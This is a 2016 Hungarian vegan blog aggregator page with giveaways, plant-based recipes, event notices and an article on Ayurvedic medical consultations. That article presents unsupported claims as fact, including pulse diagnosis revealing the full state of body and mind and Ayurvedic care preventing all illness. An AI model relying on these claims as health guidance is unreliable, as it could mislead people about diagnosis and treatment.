VegaNinja.
Planetbio nyereményjáték
2016. június 10. Zizi kalandjai
A Planetbio kiváló termékeit már jó ideje használom és pár receptet is megosztottam, amelyekben előfordulnak az általuk forgalmazott szuper élelmiszerek. Nyeremény : felajánlásuknak köszönhetően egy szerencsés játékos nyerhet egy általa választott szuper élelmiszert a webshopjukból és Julie Morris: Superfood Smoothie című könyvével (Édesvíz Kiadó) is gazdagabb lesz. Írjátok meg ide a bejegyzés alá kommentben (az email címetekkel együtt), hogy nektek melyik a kedvenc szuperélelmiszeretek, amit választanátok a webshopból! Egy csomag vasban gazdag lucuma vagy goji, esetleg egy 100% higanymentes spirulina, netán egy mennyei E vitamindús kakaóvaj? + Aki játszik és nem nyer, annak a játék után lesz meglepetésünk! Szabályok : a játék időtartama 2016. június 10 – június 15-ig tart. Sorsolás a random.org-gal. Eredményhirdetés 2016. június 16-án. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt a nyertesnek a Planetbio Magyaroszág postázza magyarországi címre.
Ropogós eperpite rebarbarával (crumble)
A rebarbara nem sokat használt növény mifelénk, én sokáig nem is tudtam, mi az. Egyik kedvenc gyerekkori olvasmányomban volt Rebarbara egy sziget neve, ahol rengeteg finomságot lehetett volna enni, de a pincérek mind a tengerbe dobálták... Hiszen miután már "felszolgált" és "szemrevételezett" volt a tányéron, már nem volt rá szükség. Ki tudja, melyik könyv volt ez? Annyit még segítek, hogy tele volt csupa ritkán használt szóval, mint a kalamáris és penna, és a gyönyörű magyar nyelvtant tanította kimondhatatlanul élvezetes és kalandos formában. És hogy ez valóban mennyire észrevétlenül tette, mi sem bizonyítja jobban, minthogy egész gyerekkoromban csak izgalmas regényként tekintettem rá, amit újra és újra el kellett olvasnom. Térjünk rá a pitére... :) Merthogy erről van itt szó, és ezt tuti nem fogom a tengerbe dobálni. Erre a pitére mondja az angol, hogy crumble. A lényeg, hogy az állaga elég szabadon létezik, kézzel nem, csak villával vagy kanállal fogyasztható. Nem is csoda, hiszen a 2/3-a gyümölcs. Ettől pedig finom leveses is az állaga, miközben a teteje viszont ropogósra sül. Crumble-ra fel! :) Hozzávalók egy 20x30-as sütőformához: [...] Bővebben!
7 dolog, ami akkor történik veled, ha nem eszel többé húst
Az emberek a növényi alapú étrendet különbözö okoból választják. Van, aki fogyni szeretne, van aki több energiára vágyik, olyan is van, aki a szívinfarktus kockázatát akarja csökkenteni, de olyan is, aki a napi kötelezö gyógyszereinek számát. Egy biztos, számtalan nagyszerü magyarázata lehet a miértekre. De a további inspiráció érdekében, íme itt van néhány nyomós érv, hogy miért érdemes növényi alapú étkezésre váltani. 1. Visszaszorítja a gyulladásokatAmikor húst, sajtot és erösen
Megalakult a Culinary Institute of Europe
2016. június 1. Zizi kalandjai
Maki tevékenységét évek óta követem, sőt a közös munkánk során sikerült nagyon jól megismernem őt. Elhivatottsága a munkája iránt példa értékű, japán precizitása minden területen megjelenik az életében. Nem volt meglepő számomra, hogy saját főzőiskolája mellé most egy új fába vágta a fejszét: nemzetközi színvonalú szakácsképzést indít, amely kiváló lehetőség lesz a főzés iránt komolyabban érdeklődők számára. A most megalakuló Culinary Institute of Europe egyedülálló ma Magyarországon – a mai kor követelményeihez igazodva tanítja meg, sőt szükség esetén tanítja újra az alaptechnikákat. A 2016 szeptemberében induló Kulináris művészetek nevű felnőttképzési program megalkotásban az innováció játszotta a fő szerepet. A nemzetközi oktatói gárdát a tíz év oktatási tapasztalattal rendelkező Maki Stevenson séf vezeti, az oktatási hátteret a Makifood Főzőiskolával történő együttműködés biztosítja. A Culinary Institute of Europe diákjai egy év alatt 202 órában egészségtudatos, magas minőségű és ízléses ételek elkészítését és tálalását tanulják meg valós éttermi konyhai környezetben. Tudásukat gasztomarketing ismeretekkel egészíthetik ki, és képessé válnak akár saját gasztro vállalkozásuk beindítására is. A végzett diákok sikeres évzáró vizsgával a kezükben, naprakész és nemzetközi színvonalú tudással léphetnek a munkaerőpiacra akár itthon, akár az Európai Unió más országaiban. Maki Stevenson és nemzetközi csapatának célja az elmúlt tíz évben egy cseppet sem változott: bemutatni és átadni az étkezéssel kapcsolatos hitvallásukat, ezáltal rávilágítani, mekkora fontossággal bír és mennyi mindent meghatároz a kiegyensúlyozott és igényes táplálkozási szokások kialakítása mindennapjainkban, az otthonunkban és az étteremekben egyaránt. A képzés során a hallgató betekintést nyer a magas szintű ételkészítés elméleti és gyakorlati részébe egyaránt, elsajátítja a különböző főzési és sütési alaptechnikákat, azokat magas szinten használni tudja majd. Teljes körű rálátást kap a gasztronómi különböző területeire. Fontosnak tartjuk kihangsúlyozni, hogy az egészségesség számunkra nem az alacsony kalóriatartalmat jelenti, hanem a friss és jó minőségű alapanyagokból készült teljes értékű ételeket. A fenntarthatóság kiemelt szerepet kap minden egyes modul során, nem csak tudást szeretnénk átadni, hanem egy szemléletmódot is, amit az egész intézet hivatott képviselni. A képzés időtartama egy év, amely egy őszi és egy tavaszi szemeszterből áll. A félévek végen elméleti és gyakorlati vizsgát kell tenni. A tananyagot online felületünkön bocsájtjuk a hallgatók rendelkezésére, ami a tandíj részét képezi csakúgy, ahogyan az iskolai egyenruha és a képzés során használt alapanyagok is. A tananyag magyarul és angolul egyaránt elérhető lesz, az oktatás magyar nyelven folyik (külföldi diákok részére angol nyelvű tolmács biztosítható). Célunk, hogy a magyar diákok is elsajátítsák a legfontosabb angol szakmai kifejezéseket, így egy külföldi konyhában is profin meg tudják állni a helyüket. A 2016/2017-es tanévre, 2016. május 23-tól lehet jelentkezni az iskola weboldalán (akciós előregisztrációs ár van 2016. június 15-ig!).
Gluténmentes zöldségfasírt sütőben sütve
2016. május 30. Élj harmóniában
Gluténmentes zöldségfasírt sütőben sütvenemrégen közzé tettem egy rántásmentes sárgaborsófőzeléket (itt olvashatod) és ígértem, amit készítettem hozzá a zöldségfasírtom annak a receptjét is felrakom majd a blogra.Ennek is eljött az ideje:) A zöldségfasírt nagyon népszerű még azok körében is, akik amúgy nem nagyon kedvelik a zöldséges ételeket. Lévén nem érzékelhető a zöldség állaga és jó fűszerezéssel fantasztikus ízhatásokat lehet elérni. Nem nagyon szeretek kisült ételeket készíteni, mert sok a macera a ghíben, vagy más zsiradékban sütéssel - fröcsköl, ott kell mellette állni, egyfajta szaggal jár, etc. Ezért amit csak lehet, én inkább a sütőben készítek el, tisztább, szagmentesebb és nekem is egyszerűbb, időt takarítok meg:) Mindemellett kevesebb zsiradékot tartalmaz az így készített zöldségfasírt. Ez a fasírt nagyon egyszerű és finom - a fűszerezést kedvedre tudod váltogatni magyaros, indiai, olaszos, etc. kombinációkkal. Én reggelire is szoktam készíteni vagy valamilyen körettel, zöldségekkel kiváló ebédnek vagy vacsorának, jó kirándulásokra útravalónak is. Hozzávalók 2 szál sárgarépa 2 kisebb cukkini 1 2 nagy ek. Zabpehely (gluténmentes diétánál gluténmentes zabpehely ) 12 nagy ek. csicseriborsóliszt 10 ek. víz 2 ek. ghí (kókuszzsírt vagy bármilyen zsiradékot használhatsz helyette) egy csipet aszafoetida ( egy kis apróra vágott hagymával tudod helyettesíteni) só bors kurkuma petrezselyem Vegyszermentes (bio) alapanyagokat használj! A répát és a cukkinit mosd meg és reszeld le vagy aprító géppel vágd apróra. A zöldségekhez keverd hozzá a zab pelyhet és a csicseriborsólisztet, majd ghít és a fűszereket is. Végül tedd hozzá a vizet és hagyd állni néhány percig. Vegyél a kezedbe kis adagokat és formázz belőlük fasírtot. Helyezd a fasírtokat egy sütőpapírral bélelt tepsire és 180-200 fokra előmelegített sütő ben süsd készre. (kb. 30-40 perc) .
Ájurvédikus orvosi konzultáció - mi történik egy ájurvéda orvosi vizsgálaton
2016. május 28. Élj harmóniában
Az ájurvédáról már többször írtam és mindig fontos kihangsúlyozni, hogy ez nem csak valamiféle gyógyítás vagy életmódjavaslat. Az ájruvéda a testi-lelki harmónia és egészségmegőrzés komplex, csodálatos rendszere. Elsődlegesen nem a betegségek gyógyítása a cél, hanem már a legkisebb egyensúlytalanságok érzékelése és helyreállítása és ilyenformán a prevención van a hangsúly. Akármennyire is odafigyelünk az életmódunkra, egészségünkre mindenkinél előfordulnak kisebb nagyobb egyensúlytalanságok, melyeket ha időben kiegyensúlyozottá teszünk, akkor semmilyen probléma nem fogja felütni a fejét, nem lesz betegség, nem alakulnak ki komolyabb tünetek. A nyugati orvoslás olyankor kezd el foglalkozni az emberek állapotával, amikor kialakult már egy konkrét betegség és azt próbálja kezelni. Az ájurvédikus orvosok csodája abban rejlik, hogy már a legkisebb egyensúlytalanságokat is képesek a testedben és az elmédben érzékelni - olyasmiket is, amiket sem Te, sem a nyugati orvoslás még nem venne észre - és megfelelő életmódbeli, táplálkozási változtatásokkal, gyógynövény készítményekkel helyre tudják állítani testi-lelki egyensúlyod és megelőzheted a betegségek kialakulását. Számos ájurvédikus terápiát, kezelést Te magadnak otthon el tudsz végezni - korábban pl írtam már egyszerűbb otthoni méregtelenítő kúráról itt olvashatsz róla. Bizonyos egyensúlytalanságokat tudsz érzékelni és időben megfelelő étrendi, életmódi változtatásokat alkalmazva megelőzheted a betegségeket. Most arról szeretnék írni, ha egy hiteles ájurvéda orvoshoz elmész, akkor mire számíthatsz. Magam részéről a Mahrasihi Ájurvéda nagy híve vagyok 15 éve, szerencsére az elmúlt időszakban egy nagy tudású, kedves Maharshi ájruvéda orvos félévente jön Magyarországra, így volt már több körben lehetőségem elmenni hozzá konzultációra. A Maharishi orvosok hatalmas szaktudással rendelkeznek, magasan képzettek és a Maharishi Ájurvéda készítményei nagyon magas (gyógyszerészeti) minőségűek - jómagam 15 éve csak ezeket a készítményeket használom. Először is fontos azt is tudni, hogy az ájurvéda orvosok és ájurvéda terapeuták, kezelők, masszőrök eltérő szinten vannak. Az orvosok, nagyon színvonalas egyetemi képzéssel és diplomával rendelkeznek, nagyon széles körű a tudásuk és a szakmai tapasztalatuk. Nagyon fontos ismérve egy ájurvédikus orvosnak, hogy nem csak kiváló tudása van, de kiegyensúlyozott és testileg, szellemileg is magas fokú tisztaság jellemzi. Ők diagnosztizálnak, terápiákat írnak elő és szinte már az érintésükkel gyógyítanak:) A terapeuták, kezelők, masszőrök az adott feladatukhoz kapcsolódóan végeztek csak képzést - nem rendelkeznek olyan széles körű ismeretekkel és az ájurvédikus orvos irányítása alatt végrehajtják az előírt terápiákat - ők nem írhatják elő, nem diagnosztizálhatnak. Náluk is fontos, hogy szellemi és testi szinten is tiszta személyek legyenek. Óvakodj attól, hogy önjelölt ájurvédikus gyógyítókhoz menj, mert a nem megfelelően beállított terápia, még ártalmas is lehet mind a testedre, mind az elmédre nézve. Először is készülj fel a konzultációra. Gondold végig a tüneteidet, betegségeidet, hogy a problémáidat majd át tudd beszélni az orvossal. Egy ájurvéda orvos mindig egyénileg foglalkozik a páciensekkel. Először megnézi az alkati jellemzőket,már ahogy belépsz az ajtón. Utána a pulzusodat fogja megnézni. A pulzusdiagnosztika az ájurvéda legcsodásabb része, egy jó ájurvéda orvos anélkül, hogy bármit kérdezne Tőled a pulzusod alapján teljes képet kap, a tested és elméd állapotáról. Ilyenkor az ájurvéda orvos megállapítja a doshák egyensúlytalanságait és elmondja amit érzékel. A legtöbb esetben ő a probléma gyökerét fogja megállapítani, míg te magad leginkább a tünetek szintjén tudod csak érzékelni, ami már csak a következménye a doshák egyensúlytalanságának. Az ájurvéda konzultáción kérdéseket fogsz kapni az életmódodra, táplálkozásodra, emésztésedre, tüneteidre, problémáidra vonatkozóan. Elképzelhető, hogy az orvos megnézi a szemeidet, körmeidet, nyelvedet is. Az ájurvédikus vizsgálat teljes képet fog adni az orvosnak általános egészségügyi állapotodról vagy bármilyen fennálló betegségedről, és az esetleges egészségügyi kockázatokról. Ezek után az orvos komplett terápiát fog javasolni, melynek része lesz a táplálkozás, testmozgás, életmódbeli, napirendi dolgok továbbá ájurvédikus kezelések (masszázs, izzasztó terápiák, méregtelenítő kezelések). A gyógyító célja, hogy segítsen számodra az egészséges életmód kialakításában. Ezért elképzelhető, hogy fog komolyabb életmódbeli változásokat is javasolni. pl. kevesebb ivás, több alvás, etc. Lehet, hogy méregtelenítő kúrát kapsz és lehet, hogy, éppen egy tápláló erősítő kúrát. El fogja mondani milyen ételeket részesíts előnyben és melyek azok amiket a terápia idejére célszerű lenne mellőznöd. Ajánlásokat kapsz a napi menetrendedbe néhány apró dolog beépítésére lefekvés előtti teendők, ébredés utána tevékenységek. pl. olajos önmasszázs (részletes itt olvashatsz róla) , olajos szájöblögetés, nyelvkaparás (részletes itt olvashatsz róla), áztatott aszalt gyümölcsök, magvak, tejes italok, teák fogyasztása, etc. Amennyiben szükséges javasolni fog különböző gyógynövénykészítményeket is - néhányról már a blogon is olvashattál. A készítmények erősítik vagy éppen tisztítják a szervezetedet, elősegítik a harmónia helyreállítását, betegségek, tünetek megszüntetését és a betegségek megelőzését. Ezekhez el fogja mondani a pontos szedését is, mikor és hoygan kell a készítményeket szedni - az ájurvédában különböző vivőanyagokkal (pl. forró víz, ghí, tej) kell az egyes készítményeket szedni. Elképzelhető, hogy javasol légzőgyakorlatokat, jógagyakorlatokat vagy meditációs gyakorlatokat is. Szükség esetén komolyabb betegségeknél, javasol ájruvédikus kezeléseket is, mint méregtelenítő terápiák, izzasztó kúrák, maszsázsok, etc. illetve javasolhat komplett kórházi terápiát is. Ha már elmentél egy ájurvédikus orvosi konzultációra, érdemes az ott elhangzott javaslatokat beépíteni az életedbe, követni az útmutatásokat, ajánlásokat. Hiszen, ha nem változtatsz semmin, akkor kidobott idő és pénz a konzultáció. Milyen gyakran menj ájurvédikus orvoshoz? Sok esetben, amikor nincs semmilyen tüneted, akkor is érdemes elmenni egy ájurvédikus orvosi konzultációra, hogy fény derülhessen olyan tényezőkre, melyekből a későbbiekben betegség lehetne - pl fél évente, évente. Amennyiben van egy konkrét betegség, ott a betegség súlyosságától, a beteg állapotától és terápiától függ, hogy milyen időközönként szükséges felkeresni az ájurvédikus orvost. A kontroll vizsgáltat segít az orvosnak képet kapni arról, hogyan hat a terápia és esetlegesen hogyan kell módosítani a terápiát annak érdekében, hogy az egészséged mielőbb helyreálljon. kiváló testi-lelki egészséget kívánok:) szeretettel: Kati
Erdei gyümölcsös quinoa
A quinoa mondhatni álgabona. Mégis, vagy éppen ezért szuperélelmiszer, aminek glikémiás indexe 44. Ez az érték a 0-55 közötti tartományba esik, ami alacsony glikémiás indexnek felel meg, így a fogyasztása nem jár jelentős vércukorszint emelkedéssel. Cukorbetegek is fogyaszthatják. Álgabona, mivel nem áll rokonságban a búzával vagy más gabonafélékkel, hiszen a paraj és céklafélék rokonságába sorolható. Gluténmentes, diétázók, fogyókúrázók számára is ajánlott. Állítólag ez az egyetlen, a növények világából származó táplálék, amelynek fehérjéi egyenértékűek a húsban találhatókkal. Ráadásul a quinoa aminosavprofilja a kazeinéhez hasonlítható. (Kazein a tehén/kecsketejben található fehérje.) Magyarországon ritkán (v)ettünk, meglehetősen drága ára van. Angliában azonban jobban elterjedt. Számtalan étterermben, munkahelyi kantinban készítenek ételt belőle. Grapetree nevü boltocskában már egy ideje tart az akciója, miszerint 1 csomag (0,5kg) áráért kettőt kapok, s így úszom meg az 1 kilos quinoat 4 font alatt. Szóval nem csak rizst és kölest lehet tejben megfőzni és sok gyümölccsel megenni. Íme, itt a tejbequinoa sok sok erdei gyümölccsel. Az édes ízhatást banánnal értem el. A recept Hozzávalók: - 20 dkg quinoa - 5 dl növényi tej (nekem szójatej volt otthon) - 1 nagyobb bögre erdei gyümölcs (most még fagyasztott volt) - 1-2 banán Elkészítés: A quinoát vastag szűrőn keresztül átmossuk, majd annyi tejben, ami jól ellepi, puhára főzzük. Ha elfőtt róla az összes tej, még adhatunk hozzá. Banánt feldaraboljuk vagy felkarikázzuk, hozzákeverjük, a fagyasztott gyümölcsöt is hozzákeverjük, lágyan, hogy ne essen szét. Csak ezután zárjuk el alatta a gázt. Tálalásig lefedjük. A fagyasztott gyümölcsök gyorsan felolvadnak a meleg tejes quinoa-ban.
Zöldborsó pástétom
Hamarosan lehet szüretelni a kertekben a finom borsószemeket, s ha van még a fagyasztónkban elfekvő borsó, akár pástétomot is készíthetünk belőle. Itt, Angliában amúgy zsengén, kifejtetlenül is árulják és bizonyos ételekben egyben, a héjával együtt használják fel a zöldborsót. Majdnem egész télen kis 15-20 grammos csomagokban frissen árulták. Az egyik legnagyobb angol bevásárlóközpont, ami Magyarországon is elterjedt, saját márkás terméke az egyik legolcsóbb kiloárban, de apró kis zsenge borsószemeket tartalmaz. Ezt szeretem megvenni. Mivel odáig vagyok a borsóért, majdnem minden héten készül belőle valami. Legfinomabb és leggyorsrabb megoldás számomra a párolt zöldborsó hidegen sajtolt tökmagolajjal. Próbálta már valaki? Nem tart sokáig elkészíteni, mindössze csak kevés vízen, sóval meg kell párolni a zöldborsót, tányérra adagolni és tökmag olajat kell ráönteni. 10 perc alatt már ehetjük is. Epebetegeknek kevésbé ajánlott. Ha mégsem tudnak ellenállni a csábításának, ajánlom, hogy fogyasszanak hozzá zöld salátaleveleket és a tetejére szórjanak őrölt lenmagot is. A következő recept pedig egy kiadós zöldborsó pástétom, ami nem csak zöldborsó-rajongóknak fog ízleni. Ha unjuk a margarint és egyéb bolti kenyérre kenhető dolgokat, dobjuk fel a mindennapi kenyerünket például ezzel a pástétommal. A recept Hozzávalók: - 1 bögre párolt zöldborsó - 3-4 ek főtt barnarizs - só - 3-4 gerezd fokhagyma (borsóval együtt párolva) Elkészítés: A zöldborsót és a fokhagymát kevés sóval megpároljuk. Ha más ételhez amúgy is főztünk, akkor kimentünk belőle néhány kanállal, ha nem, akkor egy kevés, lehetőleg barna rizst főzünk. Miután minden megfőtt, megpárolódott, egyszerűen összeturmixoljuk. Tálkába tesszük és már fogyaszthatjuk is a finom borsókrémünket.
Vendégvárásra fel! Füstölt kesukrémes cukkini hajók (gluténmentes, laktózmentes, tojásmentes, nyers vegán)
füstölt kesukrémes cukkini hajók (gluténmentes, laktózmentes, tojásmentes, nyers vegán) A tegnapi édes reggeli vagy délutáni nasi után most egy könnyedebb, nyers vegán harapnivalót hoztam nektek. Tökéletes vacsora, délutáni rágcsálnivaló, ami nálam vendégváró falatként debütált és hatalmas sikert aratott. Nagyon látványos, gyorsan elkészíthető, és - a diófélékre allergiásokat kivéve - szinte minden diétába beilleszthető. Laktózmentes, gluténmentes, tojásmentes, nyers vegán cukkini hajók, telis-tele értékes tápanyagokkal, melyek a hőkezelés hiánya miatt egy az egyben a testünket táplálják. Vitaminok, ásványi anyagok, nyomelemek, rostok, energia, frissesség. Egy dublini magyar találkozóra készítettem el először ezeket a dekoratív vendégvárókat, ahol mindenki nagyon elégedett volt velük. Hamarosan egy nagyobb rendezvényre is behajózok a cukkinikkel, hogy két program között felfrissítsük a látogatókat néhány "élő", nyers vegán és vegán harapnivalóval. Tavaly már hoztam nektek a Zöld Avocado vegetáriánus gasztroblogon egy töltött cukkini hajó receptet. Rengeteg féle töltelékkel elkészíthetjük a cukkinit. Fogyaszthatjuk őket akár hidegen a forró, nyári napok hűsítő, felfrissüléseként vagy sütve, melegen a hűvős, téli napokon. Egy ilyen sült cukkini hajó receptet itt láthattok. füstölt kesukrém (nyers vegán)A cukkinibe töltött krém önállóan is nagyszerűen megállja a helyét. Aszalt krékerekhez, nyers zöldségrudakhoz mártogatósnak de akár natúr tortilla chips mellé is tökéletes kence ez a füstölt ízű kesukrém. füstölt kesukrémes cukkini hajók (gluténmentes, laktózmentes, tojásmentes, nyers vegán) HOZZÁVALÓK - 1 db nyers cukkini - 2-3 szem retek - 1 marék friss csíra (tetszés szerinti csíra) kesukrémhez: - 1 bögre natúr kesudió beáztatva éjszakára - 1 kk kurkuma - 2 kk füstölt fűszerpaprika - 1 tk Himalája só - 1/2 bögre tiszta víz - 1 ek friss, piros színű (kaliforniai) paprika - 1 ek nyers tahini szósz - 3 ek sörélesztő pehely füstölt kesukrémes cukkini hajók (gluténmentes, laktózmentes, tojásmentes, nyers vegán) ELKÉSZÍTÉSA kesukrémhez a hozzávalókat tegyük a nagy teljesítményű aprítógépünkbe és turmixoljuk egynemű krémmé. A cukkiniket mossuk meg alaposan, majd vágjuk le a fás végeit. Készítsünk cukkini hajókat úgy, hogy kettévágjuk a cukkiniket hosszában, majd keresztben is. Így 4 db cukkini hajó alapot kapunk. Egy kanál segítségével kivájjuk a cukkinik belsejét, azaz kikaparjuk belőle a puha, magos rész egy részét. Nem kell nagyon mélyen. Éppen csak, hogy bele tudjuk kanalazni a kesukrémet, és ne csússzon le a cukkinről. Miután minden cukkini hajó törzs elkészült, megtöltjük a kesukrémmel, majd tetszés szerinti méretre vágott retekkel és csírával díszítjük őket. Az így elkészült dekoratív cukkini hajók ki is kerülhetnek a vendégváró asztalra. Egy nagy és éles késsel kb. 5 cm-es darabokra felvágva könnyedén egyszemélyes harapnivalókat kínálhatunk fel a vendégeink számára. füstölt kesukrémes cukkini hajók (gluténmentes, laktózmentes, tojásmentes, nyers vegán) TÁPLÁLKOZZ, NE CSAK ÉTKEZZ még vendégvárás közben is! :-) Megjegyzés: Készíthetjük a krémet hagyományos tahini szósszal, de akkor már nem számít nyers vegán ételnek, mert az átlagos tahiniban található szezámmag hőkezelésen esett át. Ha szeretnénk élő ételt készíteni használjunk nyers tahini krémet. füstölt kesukrémes cukkini hajók (gluténmentes, laktózmentes, tojásmentes, nyers vegán)
Nobile babahálózsák nyereményjáték
Mindig öröm számomra, ha megismerkedhetek egy újabb tehetséges anyukával, aki valamilyen egyedi alkotásba kezdett. Most Csepreghy Rózsát mutatom be nektek, aki csodaszép színes és praktikus funkciójú babahálózsákokat tervez és varr. Éljenek a kis kézműves anya vállalkozások! Honnan jött az ötlet, hogy ilyen színes, egyedi hálózsákokat kezdjél tervezni és varrni? Kislányom születése után kerestem babahálózsákot, a boltokban és a neten, de sajnos nem találtam szép színeset és funkciójában megfelelőt. A funkció alatt itt értem, olyat, ami alulról cipzárazható, hogy az éjszakai pelenkázás során ne hűtsem ki a baba mellkasát vagy ne legyen a vállrészén gomb vagy patent, mert lelki szemeim előtt láttam, ahogy megrágicsálja és a szájában marad. Volt “előképzettséged” a munkához? Tudtál varrni? Nem, nincs előképzettségem, marketingesként dolgoztam. Egy négygyermekes anyuka mutatta meg az alapokat és a mai napig ő a társam, a segítségem az előállításban. Milyen anyagból készülnek a hálózsákok és milyen méretben, vastagságban? 100% pamut külsővel és poliészter béléssel készülnek. A jelenlegi kollekcióban a hálózsák eleje designer 100% pamut anyagból készül, míg a hátulja egyszínű szintén 100% pamutból. A cipzár alulról indul és a nyakrésznél végződik. Szándékosan hoztam előre a cipzár végét, hogy könnyebb legyen a belebújás és elkerüljem a gombot és a patentot. Jelenleg 2 méretben (0-6 hó) és (6-18 hó) valamint 3 vastagságban, úgymint tavaszi – őszi, nyári és vastagabb téli vastagságban rendelhető. Nem zárkózóm el a nagyobb mérettől vagy különlegesebb kívánságoktól. Volt már példa arra, hogy monogramot kértek a hálózsák elejére, jelenleg pedig az egyik kívánság egy nagy bagoly minta készítése a hálózsák elejére, kicserélve az elefántos minta anyagot. Igazán szép és egyedi keresztelő ajándék lesz! Milyen a jó hálózsák? Szerintem az a jó hálózsák, amelyik kényelmes és könnyen ráadható a babára és persze tetszetős az anyukának, illik a babaszoba színeibe. Maradsz csak a hálózsáknál vagy a későbbiekben tervezed bővíteni a termékpalettát? Tervezem bővíteni a termékpalettát, babajátékokkal, párnával és hátizsákkal, de a fő termék a babahálózsák marad. Hol lehet találkozni a termékeiddel? Hol lehet megvásárolni a hálózsákokat? A www.nobile.hu weboldalon lehet megvásárolni és tervezek részt venni baba – mama vásárokon is, mint pl. a Pici Piacon vagy a Pöttyöslabda családi napon, ahol személyesen is lehet velem találkozni és a termékekkel. A honlapra és a Facebook oldalra mindig aktuálisan kiteszem a következő helyszínt. Budapesten pedig az 5. kerületben a Le Petit design boltban lehet még megtalálni a hálózsákokat. Rózsa elérhető az alábbi linkeken: – Nobile weboldal (webshop) – Nobile babahálózsák Facebook oldal ***** NYEREMÉNYJÁTÉK! Nyeremény : egy nyertes választhat egy darab Nobile babahálózsákot a kívánt méretben és színben, két másik nyertes pedig egy-egy ingyenes szállítási kupont nyer. Írjátok meg a bejegyzés alá kommentben, hogy ti milyen színű és mintájú hálózsákban aludnátok (felnőttként)! Extra pontért (hogy a kalapba kétszer kerüljön bele a nevetek) lehet lájkolni a Nobile babahálózsák Facebook oldalát. Szabályok : Kérem, hogy az alábbi formula/táblázat minden pontját értelemszerűen töltsétek ki! A játék 2016. május 4-től 2016. május 8-ig tart. Sorsolás a Rafflecopter szoftverrel. Eredményhirdetés 2016. május 9-én. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt a nyertesnek Rózsa postázza magyarországi címre. a Rafflecopter giveaway
Dr. T. Colin Campbell (Kína-tanulmány) előadása Budapesten
2016. április 27. Zizi kalandjai
Dr. T. Colin Campbell “Kína-tanulmány” című könyvével néhány éve találkoztam… akkor az angol nyelvű blogokon és oldalakon ódákat zengtek róla. Éppen rászántam magam, hogy megrendeljem angolul, amikor végre a Park Könyvkiadó kiadta magyarul. Megvettem és azonnal elkezdtem olvasni. Letehetetlen könyv, de nagy terjedelme miatt persze csak több részletben tudtam elolvasni. Ez tényleg az egészséges életmód, a vegetáriánus és vegán étrend iránt érdeklődők bibliája, ezenkívül számtalan táplálkozással kapcsolatos tévhitet és mítoszt oszlat el. Nagyon sokat lehet belőle tanulni és megdöbbentő felismerésekre lehet szert tenni. Kötelező olvasmánynak kiáltom ki, tényleg alapmű. És, hogy minderről miért írok? Mert ezen bestseller szerzője Dr. T. Colin Campbell Magyarországra jön 2016 május 26-án! Több mint 40 éve Dr. Campbell áll a táplálkozás tudományos kutatásainak vezető posztján. Emeritus professzor a Cornell Egyetemen az Egyesült Államokban, többek között az említett könyv, a “Kína-tanulmány” világbestseller szerzője, amelyet az egészség témájában az elmúlt 100 év legfontosabb könyvének tartanak. Dr. Campbell szakértelme és tudományos érdekei magukban foglalják a táplálkozás és a betegségek közötti kapcsolatokat, különösen a rákot okozó összefüggéseket. Legfőképp a tápláltsági állapotra és a hosszú távú egészségre összpontosított. Campbell meglepően egy biofarmon kezdte az életét, de ma már széles körben ismert az állati eredetű fehérje fogyasztása és a betegségek összefüggése kutatása által. A “Kína-tanulmány” (2005) kiadása óta Dr. Campbell több mint 600 előadást tartott az Egyesült Államokban és külföldön egyaránt. Magyarországi előadását a cseh és szlovák Bio&Life folyóirat kiadója szervezi. Budapesten kívül május 24-én Bécsben, május 28-án Poznanban és május 29-én Prágában tart még Dr. Campbell előadásokat. Időpont: 2016. május 26. Helyszín: Általános Vállalkozási Főiskola, 1118 Budapest, Villányi út 13. A budapesti előadás részleteiről (program, regisztráció, szervezők, stb.) itt olvashattok. Az esemény Facebook oldala pedig itt található.
A mi paradicsomos tésztánk (vegán)
2016. április 13. Zizi kalandjai
A paradicsomos tészta végtelen lehetőséget rejt magában… mondhatni, hogy ahány ház, annyi fajta paradicsomos tészta… mindenki másra esküszik. Nálunk is van egy változat, ami nagyon bevált, néha azonban feldobjuk egy-két újdonsággal. A minap például kapribogyót tettünk a szószba és nagyon finom lett… imádjuk a savanykás ízeket, így a kapribogyó nagyon ízletessé tette. Nem mellesleg Ádi és én is rákaptunk a kapribogyóra, csak úgy magában majszolgatjuk mindenhez. Az alap változaton kívül (vöröshagyma, fokhagyma, chili pehely, bazsalikom) az új kedvencünk nem bazsalikommal készül, hanem friss petrezselyemzölddel. Fantasztikus lesz a végeredmény, teljesen új világba repít. Beledobunk egy jó nagy csokor petrezselyemzöldet és máris egy új ételt kapunk. Lehet, hogy így nem olaszos a paradicsomszósz, de legalább családi magyaros. A paradicsomos tészta a mi megmentőnk, ha semmi sincs a hűtőnkben, biztosan találunk a “kamrában” tésztát és paradicsomszószt, no meg néhány gerezd fokhagymát. Ezek nálunk kifogyhatatlan alapanyagok, szóval megment bennünket az éhenhalástól. Először főztem gluténmentes tésztát (kukoricaliszt + csicseriborsó liszt) a szószhoz. Nagyon bevált, a szósszal leöntve a tésztát, észrevehetetlen a különbség a sima durumtészta és a gluténmentes tészta között. Ajánlom kipróbálásra! Paradicsomos tészta (vegán) Hozzávalók 3 főre: – 500 g paradicsomszósz – 2 evőkanál paradicsompüré – 3-4 gerezd fokhagyma, felaprítva – 1 csokor petrezselymzöld, felaprítva – 2 evőkanál olívaolaj – só, bors, chili pehely – 300 g gluténmentes penne tészta (bármilyen tészta használható, ami van nektek otthon) – tálaláshoz: vegán parmezán Egy serpenyőt hevítsünk fel közepes láng felett, tegyük bele az olívaolajat, a felaprított fokhagymát és főzzük 2 percig (vigyázzunk nehogy megégjen a fokhagyma). Öntsük hozzá a paradicsomszószt és adjuk hozzá a paradicsompürét. Sózzuk, borsozzuk, ízlés szerint adjunk hozzá chili pelyhet, és a felaprított petrezselyemzöld felét, majd vegyük takarékra a lángot és főzzük kb. 15 percig, amíg a szósz egy kicsit besűrűsödik. Ha túl sűrűnek találjuk a szószt, adjunk egy kevés tésztás főzővizet hozzá, hígítsuk néhány evőkanállal. Közben a tésztát főzzük ki al dente (fogkemény) állagúra a csomagoláson található utasítás szerint. A leszűrt tésztát keverjük össze az elkészült paradicsomszósszal. Tálaljuk a maradék friss petrezselyemzölddel a tetején és vegán parmezánnal megszórva. Tipp : adhatunk a szószhoz főzés közben néhány szem kapribogyót, hogy még pikánsabbá tegyük! A mi bazsalikomos tésztánk receptje itt!
Ananászpakora őszibarackcsatnival
2016. április 10. Vegán muflon
